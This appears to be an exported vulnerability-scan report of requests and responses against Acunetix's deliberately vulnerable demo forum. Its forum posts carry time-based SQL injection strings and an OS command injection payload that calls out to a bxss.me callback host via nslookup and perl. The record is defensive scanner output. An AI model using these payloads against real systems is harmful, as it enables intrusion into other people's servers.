tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=57 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4246 |
Response Body - size: 4,246 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:22 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=58 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4468 |
Response Body - size: 4,468 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:23 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=59 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1'" </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1'" </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:38 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1'" - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4317 |
Response Body - size: 4,317 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>&(nslookup hitgvavrmebey35980.bxss.me||perl -e "gethostbyname('hitgvavrmebey35980.bxss.me')")&'\"`0&(nslookup hitgvavrmebey35980.bxss.me||perl -e "gethostbyname('hitgvavrmebey35980.bxss.me')")&`'</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=60 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4120 |
Response Body - size: 4,120 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:42 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=61 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4138 |
Response Body - size: 4,138 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum @@NiQ6e </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/@@NiQ6e </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>@@NiQ6e - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=62 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img 